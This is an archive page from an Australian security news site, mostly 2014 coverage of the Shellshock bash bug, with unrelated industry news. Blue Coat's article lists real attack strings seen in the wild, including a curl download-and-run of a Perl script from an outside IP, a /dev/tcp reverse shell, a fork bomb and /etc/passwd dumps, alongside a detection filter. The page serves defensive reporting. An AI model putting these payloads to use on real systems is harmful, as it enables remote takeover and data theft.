phone number

Archive for the ‘ARTICLES ’ Category

Blue Coat’s Shell Shocked Response

Posted on: September 30th, 2014 by

By ASM

Bluecoat Logo

By Dr. Hugh Thompson Program Committee Chairman of RSA Conference, Senior VP and Chief Security Strategist of Blue Coat Systems

Since the announcement of the CVE-2014-6271 bash bug, we’ve seen attackers waste no time before scanning the Internet.  The announcement was posted to bugzilla.redhat.com at 2014-09-24T14:00:08+00:00 and at 2014-09-24T18:32:008+00:00, 4 ½ hours later, we started seeing scans looking for the vulnerability.

If you haven’t had a chance to read the details yet or have been away for the last 24 hours I’ll give a quick run-down.  In essence, the vulnerability exists in the way bash evaluates variables.  If a variable begins with “() {“ then contents of the variable are evaluated by a shell parser prior to being passed to the bash command line. For example, if I set the variable var to ‘echo boo’ and then try and pass that to a command shell nothing happens.

plum@Hall:~$ export var=’echo boo’

plum@Hall:~$ bash -c ‘var’

bash: var: command not found

plum@Hall:~$

But if I add “() {:;};” in front something magical happens.

plum@Hall:~$ export var=’() { :;}; echo boo’

plum@Hall:~$ bash -c ‘var’

boo

plum@Hall:~$

The contents of my variable were executed on the command line! One place where this becomes a huge issue is in the case of web applications.  $HTTP_USER_AGENT is one such variable that is automatically set when using CGI and PHP.  An attacker can spoof that parameter and if that variable ever crosses paths with the shell bad things can happen.

Here are just a few examples of User-Agents we have seen scanning for this vulnerability:

() { :;}; /bin/ping -c 1 198.101.206.138

() { :;}; echo; echo vulnerable to CVE-2014-6271

() { :; }; :(){ :|: & };:

() { touch /tmp/coco; };

() { :;}; echo; /usr/bin/id;

() { :;}; /bin/sleep 0

() { :;}; echo aa>/tmp/aa

() { :;}; /bin/bash -c ‘cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur’

() { :;}; /usr/bin/telnet 67.229.128.88 21

() { :;}; echo ‘Warning: Server Vulnerable’

() { :;}; #{/usr/bin/ping -c 1 192.71.20.2}

() { test;};/usr/bin/touch /tmp/VULNERABLE

() { :; }; echo ; echo qwerty

() { :;}; /bin/ping -c 1 192.71.20.2

() { :; }; ping -c 11 209.126.230.74

() { :;}; wget http://shellshock.brandonpotter.com/report/WWOJ2KWSVKOWF40WXBND74/User-Agent

() { :;}; echo ‘BashSmash:

() { :;}; echo OHAI

() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd

() { :; }; /bin/cat /etc/passwd > dumped_file

() { :; }; echo -e ‘Content-Type: text/plainn’; echo qQQQQQq

() { :; }; /bin/bash -i > /dev/tcp/176.31.93.197/8081 0>&1

Additionally, we’ve also started seeing DDOS botnets trying to utilize this in their attacks.  For a little while I’d expect to see an ever-increasing amount of web traffic targeting this vulnerability.

Because this bug exists in the /bin/bash parser it could present its ugly head in any number of fields accepted from a client.  User Agent, referrer, URL variables, cookies, and any other header fields are all possibilities.  It all depends on server configurations and if any of those fields are passed as a variable on the command line.  As more common web frameworks are analysed I would suspect more targeted attacks to be forthcoming. There are already findings suggesting that other sevices may be affected by this too.

There is already a patch out for the nasty bug and if you have automatic updates configured there is a good chance it may already be installed. However, I wouldn’t bet your server on it so it would be best to double check.

Using the Security Analytics Appliance we can easily detect these attacks.  Simply create a filter looking for the “() {}” pattern in HTTP requests to start tracking the attempts as shown below.

{“Shell Shock User-Agent attempt”:["user_agent=*(*)*{*}*"]}

This would also be a good time to evaluate your web applications and determine just what is being thrown across the command line.  Calls to popen(), system(),  Runtime.getRuntime().exec() or the equivalent all expose the vulnerability.

The post Blue Coat’s Shell Shocked Response appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Blue Coat’s Shell Shocked Response

  

Kaspersky Lab appoints Australian as APAC Managing Director

Posted on: September 30th, 2014 by

By ASM

kaspersky_registered_partner.png

Kaspersky Lab has announced the appointment of Peter Hewett to the position of Managing Director for the Asia Pacific region.

In his new role, Hewett will be responsible for the company’s overall business operations in the Asia Pacific region, including sales, marketing and business development functions.

Hewett brings to the role a range of expertise in the development of regional business strategies, and is helping build on the company’s continued success amidst what is arguably the world’s most dynamic region.

“I am glad to have the opportunity to join Kaspersky Lab and I’m excited to take on this role in this fast-growing region. I believe the Asia Pacific team has taken great strides to establish the market-leading position that Kaspersky Lab now enjoys in the region. I look forward to leveraging my technical and business management expertise as I work with the entire APAC team to further reinforce this position and reach greater heights in driving business growth,” Hewett said.

With 23 years’ experience working across the channel in both vendor and distributor environments, he brings to Kaspersky Lab a strong commercial understanding of business and consumer-orientated IT security solutions, and is helping drive Kaspersky Lab’s channel-driven strategy across the APAC region.

“The ongoing economic boom in Asia has made the APAC region a market that is both fast growing and very challenging. We are prepared for this, offering a comprehensive line of fully-fledged security solutions backed up by a strong regional team that is now enhanced by Peter Hewett’s leadership,” Garry Kondakov, Kaspersky Lab’s Chief Business Officer, said.

The appointment follows the retirement of Harry Cheung, who held the position from 2008.

Prior to joining Kaspersky Lab, Hewett was Sales Director for Westcon Group Australia.

The post Kaspersky Lab appoints Australian as APAC Managing Director appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Kaspersky Lab appoints Australian as APAC Managing Director

  

Lockheed Martin Australia establishes Asia Pacific ICT Engineering hub in Melbourne

Posted on: September 30th, 2014 by

By ASM

Lockheed Martin

Lockheed Martin has announced it is establishing an Asia Pacific Information Communications Technology (ICT) engineering hub in Melbourne in close partnership with the government of Victoria. The new engineering hub is expected to generate up to 150 new ICT jobs in Lockheed Martin Australia’s operations in Melbourne, more than doubling its current workforce.

The new Asia Pacific ICT engineering hub will be operated by Lockheed Martin’s Information Systems and Global Solutions (IS&GS) business. The facility will be equipped to provide a full range of regional research and development and program delivery service. The capabilities that will be based at the facility will expand existing local skills in cyber security, data management, applications development and larger scale ICT services.

Lockheed Martin IS&GS Vice President for Global Solutions, Anne Mullins, said $8 million will be invested to establish the Asia Pacific ICT engineering hub in a new facility at Clayton, a suburb of Melbourne. “This investment adds to our existing footprint in Dandenong and Glen Waverley, and will accommodate 190 staff primarily servicing ICT systems development. At least 150 of these will be new personnel, doubling our presence in Melbourne and providing high technology jobs to service local customers and capability to expand export opportunities”.

A financial support package from the Victorian Government focused on infrastructure enhancements, training and upskilling was instrumental in supporting the business case for a Victorian location. The support package will be used to assist Lockheed Martin deliver to its expanding workforce world class skills in key global technologies in cyber, mobility and big data. “Following the recent signature of an $800 million contract to transform the ICT environment for the Australian Department of Defence, Victorian staff will play a key role in not only advancing that capability, but also providing support for the customer over the next decade,” said Anne Mullins.

Lockheed Martin Australia and New Zealand Chief Executive, Raydon Gates, said “establishment of the Asia Pacific ICT engineering hub builds on a 20-year history of Lockheed Martin undertaking high technology development work in Victoria. This business has successfully delivered dozens of programs to State and Federal Government organisations and commercial customers since the original contract with the Department of Defence to develop the Jindalee Over-the-Horizon Radar Network (JORN), which remains one of Australia’s largest indigenous technology national security projects.

Lockheed Martin is a global leader in complex ICT systems delivery and support, and has been the largest supplier of ICT services to the U.S. Government for twenty years in succession. At Lockheed Martin Australia’s headquarters in Canberra, the company currently supports demanding ICT requirements for the Australian Tax Office, and operates an Australian Cyber Capabilities demonstration and operations centre.

“Victoria was selected to establish the new Asia Pacific ICT engineering hub based on the State’s availability of highly skilled graduates, outstanding ICT education institutions and the support provided by the state government” said Raydon Gates. “This investment in Victoria will not only extend the skill base of our Australian cyber centre, but will also act as a hub to generate activity and engagement with small-to-medium sized companies, thus further expanding Lockheed Martin’s Global Supply Chain initiatives which have already generated multiple Australian export success stories.”

Headquartered in Bethesda, Maryland., Lockheed Martin is a global security and aerospace company that employs approximately 113,000 people worldwide and is principally engaged in the research, design, development, manufacture, integration, and sustainment of advanced technology systems, products and services. The Corporation’s net sales for 2013 were US$45.4 billion. Lockheed Martin Australia, headquartered in Canberra, is a wholly-owned subsidiary of Lockheed Martin Corporation. The company employs more than 900 people in Australia and New Zealand working on a wide range of major programmes spanning the aerospace, defence and civil sectors

The post Lockheed Martin Australia establishes Asia Pacific ICT Engineering hub in Melbourne appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Lockheed Martin Australia establishes Asia Pacific ICT Engineering hub in Melbourne

  

S2 Security Introduces S2 Mobile Security Officer

Posted on: September 30th, 2014 by

By APSM

S2 Security Logo

Revolutionary Tablet App Makes Security Departments More Effective

S2 Security, the  leader in IP-­‐based integrated physical security systems, has announced the introduction of S2 Mobile Security Officer, a revolutionary tablet app that makes security departments more effective. With S2 Mobile Security Officer, security management and staff can now operate their S2 access control and video management systems from anywhere, dramatically improving productivity, decision-making and response time.

Modelled after the “battlefield awareness” concept developed by military operations, S2 Mobile Security Officer is designed for ease of use, speed of information sharing, and real time response to situations in the field, while leveraging the advanced technology built in to every S2 system. S2 Mobile Security Officer is administered from a central location, and all actions taken by field security officers are instantly sent back to the command centre.

“Our vision is for users to be able to interact with their S2 system wherever, whenever and however they want,” said John L. Moss, CEO, S2 Security. “S2 Mobile Security Officer is an industry first that makes this a reality, with more exciting product developments to come.”

S2 Mobile Security Officer allows mobile users to remotely open or lock doors; monitor activity and alarms; and muster for evacuations, coordinating multiple mustering points right on the tablet screen. Acting as a photo ID capture camera, S2 Mobile Security Officer lets users take photos and ass them immediately to their centrally managed S2 system from the field. Users can also access and control surveillance cameras on demand, displaying high-quality, high frame rate video that can be shared as needed, where needed.

…read more

Source: S2 Security Introduces S2 Mobile Security Officer

  

Parental sexual offending: Managing risk through diversion

Posted on: September 29th, 2014 by

Using an Australian sample of 172 male parental offenders referred to community-based treatment designed for low-risk offenders, this study retrospectively compared risk levels and re-offence rates of offenders accepted into treatment (46%) with those who returned to court for standard criminal prosecution (54%). The Violence Risk Scale-Sexual Offender Version, a third-generation actuarial sex offender risk assessment and treatment planning tool, measured dynamic risk before treatment.

…read more

Source: Parental sexual offending: Managing risk through diversion

  

Shellshock – potentially a ‘plague-like’ vulnerability

Posted on: September 26th, 2014 by

By APSM

TrendMicro_logo

According to the threat defence experts at Trend Micro, since Shellshock is related to Linux – it can effect both PC and Apple platforms.

In short, this is potentially a “plague-like” vulnerability that can exploit command access to Linux-based systems constituting approximately 51 percent of web servers in the world.  Because of the pervasiveness, attacks against it could “grow” at a very fast pace. The recent Heartbleed vulnerability is similar in nature to Shellshock, but Heartbleed is dwarfed by the extent and reach of this new vulnerability.

Due to the widespread nature of Shellshock – the action listed below should be taken for the following:

  1. -End-user: watch for patches and implement them immediately
  2. -IT Admin:  if you have Linux, disable BASH scripting immediately
  3. -Website operator: If BASH is in the script, patch asap, or rescript away from BASH
  4. -Hosting co. customer: Ask your provider they’re doing to remedy and apply patches accordingly

Security experts from NetIQ also strongly urge companies to identify all sensitive, Internet-facing servers and conduct a patch analysis in light of the Shellshock bug. According to Geoff Webb,  Senior Director, Solution Strategy at NetIQ, in cases where patch records are difficult to obtain or nonexistent, it is then time for “boots on the ground.” Security officers or administrators can perform a quick test on a server or appliance to see if it is vulnerable.

The following simple script may be executed from a Bash command prompt. If the message “This system is vulnerable” appears, the server must be patched immediately or disconnected from the Internet until maintenance can be performed. In the example above, I have demonstrated a vulnerable system. If the system has already been patched, then it would report something like the following:

  1. bash: warning: myvar: ignoring function definition attempt
  2. bash: error importing function definition for `myvar’
  3. Test for Shellshock:

The test above does not scale to hundreds of servers or more. This is where an investment in a patch management and automation system or vulnerability remediation tool pays for itself.

Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender suggests while most operating system vendors have already issued a partial fix to make attacks more difficult to implement, this is not a complete fix but rather a barrier to buy vendors more time to find a universal solution.

“A significant part of the Internet is running a Linux or UNIX-based version of an operating system that includes the bash shell. These UNIX-based web servers often run CGI scripts that rely on bash for functionality, therefore any attack against these scripts could result in exploitation and subsequently, could allow a hacker to remotely own the machine,” says Mr Botezatu.

Bitdefender Logo“Additionally, attacks against web servers are very easy to implement and carry. The typical attack scenario involves an automated tool that tries to access CGI scripts and pass the environment variable as User-Agent (a string that tells the webserver what type of browser is being used on the other end so that the server knows how to format data before sending it).”

Bogdan advises that workstations (such as Mac OS X computers) and embedded Linux devices can also be subverted via bash attacks if specific prerequisites are met i.e. the attacker resides on the same network as the victim device.

It is recommended that those with vulnerable systems update the operating system immediately and then check back to see if there is a complete fix available.

…read more

Source: Shellshock – potentially a ‘plague-like’ vulnerability

  

Palo Alto Networks addresses Bash vulnerability Shellshock

Posted on: September 26th, 2014 by

By ASM

Palo Alto Logo

The details of a vulnerability in the widely used Bourne Again Shell (Bash) have been disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.

While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security community quickly dubbed it “Shellshock.” Bash is present in most Linux and Unix distributions as well as Apple’s Mac OS X, and there’s a good chance anyone reading this has a system they need to patch.

Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 “Bash Remote Code Execution Vulnerability.”

All versions of PAN-OS and Panorama include the vulnerable version of Bash, but we’ve determined the issue is only exploitable by authenticated users. Normal PAN-OS maintenance release updates will provide a fix for the vulnerability. We have posted the advisory on our product vulnerability page. Read on for more details.

Vulnerability Details

CVE-2014-6271 exists in all versions of Bash and is related to how environment variables are processed when the shell starts up. Environment variables are used by shell software to store pieces of information like the location of the user’s home directory. In addition to storing variables, Bash allows for storing shell functions in variables that users can call later. It’s in parsing these functions that the new Bash vulnerability exists, as the shell mistakenly executes code that is added after a function definition. Here’s an example:

$ env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”

vulnerable

this is a test

Bash should stop processing the environment variable “x” after the closing semicolon for the function, but instead continues to process “echo vulnerable”. At first glance, this might not seem too dangerous as executing commands is Bash’s primary function, but it’s important to understand that many other programs use Bash to process commands.

  • Apache Servers running mod_cgi and mod_cgid may spawn Bash shells and pass malicious HTTP Headers and request variables that exploit the vulnerability.
  • OpenSSH parses passed environment variables with Bash in some cases, making it vulnerable to privilege escalation through this vulnerability.

While these two scenarios are currently the most-likely vectors for exploiting this vulnerability, it’s likely that other services use Bash in a network-exploitable way. The only way to fully prevent exploitation is to upgrade Bash on the system to a non-vulnerable version.

Impact

The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure. The bad news is that this vulnerability is going to have a very long tail. Bash is the default shell for the most-popular Linux variants and every version of the software stretching back over two decades is vulnerable. Well-maintained systems will be patched today, but that dusty old system in the networking closet might never get the update. Additionally, network devices, embedded systems and Internet-connected devices (like IP Cameras) often run Linux and could be vulnerable.

Fortunately, not every system is remotely exploitable simply because it’s running Bash, it also needs to be running an application which makes Bash accessible over the network. As described above, the most-common exploit scenario seems like it will be web servers running Apache and using CGI scripts. Web servers are great resources for attackers. They can be used to:

  • Launch DDoS attacks (See Operation Ababil)
  • Infect visitors with malware
  • Gain a foothold in a network and spread to additional systems
  • Steal sensitive data accessible to the web server

These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.

Recommendations

  • Palo Alto Networks Threat Prevention customers should immediately update to Threat Content Version 457 to deploy vulnerability signature 36729, which detects exploitation of CVE-2014-6271 through HTTP requests.
  • Monitor Threat logs for hits on this signature and consider blocking future requests from the sending IP addresses. This activity may be an attacker performing reconnaissance against your network for future attacks.
  • Apply patches to vulnerable systems to update Bash to a non-vulnerable version.

At the time of this publication Apple has not released updates for Mac OS X to address this issue. However, patches for Bash 3.2 (included with Mac OS 10.9) are available from org for those who choose to compile their own version. If you can’t update Bash, consider replacing it with an alternative shell but be aware that this can cause compatibility issues.

PAN-OS users can mitigate the impact of this vulnerability by disabling non-administrator accounts that could use the vulnerability to gain escalated privileges.

The post Palo Alto Networks addresses Bash vulnerability Shellshock appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Palo Alto Networks addresses Bash vulnerability Shellshock

  

Australia hits number one in global phishing attacks

Posted on: September 26th, 2014 by

By ASM

kaspersky_registered_partner.png

Analysis undertaken by Kaspersky Lab experts examining the latest evolution of spam has revealed that Australia almost doubled its share of global phishing attacks, making it the world’s most targeted country for phishing attacks.

The analysis of August figures shows that the number of Anti-Phishing component activations on computers of Australian users doubled, accounting for nearly a quarter of the world’s total phishing attacks, at 24.4%.

Australia’s latest ranking has pushed Brazil (19.5%) down to second position. The UK (15.2%) and Canada (14.6%) came third and fourth respectively.

August saw phishing activity increase by 62% with 32 million detections globally. Experts have attributed this considerable growth in phishing attacks to the seasonal decline in the demand for advertising spam.

“In August, we recorded a significant increase in the number of phishing attacks. To keep making money cybercriminals have switched to other types of spam, including phishing scams. By faking messages from well-known services, social networks or financial organisations, phishers are able to significantly improve the chances of their spam being successful,” Tatyana Shcherbakova, Anti-spam Analyst at Kaspersky Lab, said.

Yahoo! was attacked often enough to displace Windows Live as one of the top three organisations attacked by phishers, ranking behind Facebook and Google; with the latter maintaining its top position among organisations attacked by phishers.

Overall, the US ranked first among source countries of spam distributed around the world, while the UK now leads the ranking based on the number of users targeted by spammers sending malicious attachments.

Cybercriminals who distributed malicious attachments in spam messages again used fake Facebook notifications as a lure for users. The spam messages indicated to users that the social networking site had been hacked, with the faux ‘developers’ asking users to install the utility attached in order to avoid problems in future. Instead of the promised utility, the ZIP archive attached to the message contained the Haze Trojan-Downloader, which is used by cybercriminals to download other malware, including code designed to steal personal data from the computer’s owner or send infected messages to all the addresses in the contact list.

The top three positions in August’s malware ranking were taken by Trojans; the top two of which – Redirector and Fraud – are HTML-pages. Redirector steers users to an infected site, where they are usually invited to download Binbot – a service for automatically trading in popular binary options. As for Fraud, it is used as a registration form for online banking services and sends stolen financial information to phishers. The third position is taken by the Upatre Trojan-Downloader. Malware in this family usually downloads a Trojan-Banker designed to attack financial institutions.

Kaspersky Lab has cautioned users to be more vigilant against these types of attacks.

“To avoid becoming a victim, remember these simple rules: check the sender address and be particularly careful with messages containing attachments. It’s better to contact the company directly than trust an email and lose your personal data,” Shcherbakova said.

The full text of the report is available on Kaspersky Lab’s Securelist website

The post Australia hits number one in global phishing attacks appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Australia hits number one in global phishing attacks

  

‘Aspiring to Excellence’ Security Research Initiative Report

Posted on: September 25th, 2014 by

By ASM

Perpituity Research logo

Final published copy of the Security Research Initiative report for this year, ‘Aspiring to Excellence’ which has been publicly released. The final report can also be accessed along with other publications via:

http://perpetuityresearch.com/1473/aspiring-to-excellence/

The post ‘Aspiring to Excellence’ Security Research Initiative Report appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: ‘Aspiring to Excellence’ Security Research Initiative Report

  

McAfee uncovers BERserk security flaw in Mozilla Firefox browser

Posted on: September 25th, 2014 by

By APSM

McAfee Logo

The Intel Security Advanced Threat Research Team has discovered a critical signature forgery vulnerability in the Mozilla Network Security Services (NSS) crypto library that could allow malicious parties to set up fraudulent sites masquerading as legitimate businesses and other organisations, accessible to Firefox users (20% of the Internet’s users).

“Ensuring user security and privacy on the Internet has always been a top priority at Intel Security,” said James Walter, Director, Intel Security Advanced Threat Research.

“Dubbed ‘BERserk’, the vulnerability could be exploited to allow malicious parties to set up fraudulent web sites masquerading as legitimate websites normally identified and protected by Secure Sockets Layer (SSL) authentication and encryption,” says James.

“Upon discovery of this issue, the Intel Advanced Threat Research team notified Mozilla to facilitate the mitigation and resolution of the vulnerability. We also engaged CERT/CC to ensure that all affected parties are responsibly and effectively notified and given mitigation guidance on this issue, and to review other commonly used cryptographic libraries for similar issues.”

He added, “While Intel is unaware of any attacks exploiting BERserk, we strongly advise individuals and organisations using Firefox to take immediate action to update their browsers with the latest security update from Mozilla.

McAfee will continue to update our customers, affected parties, and the broader consumer and business user communities as new details emerge.

For more information, please see McAfee blog post here: http://blogs.mcafee.com/?p=38215

…read more

Source: McAfee uncovers BERserk security flaw in Mozilla Firefox browser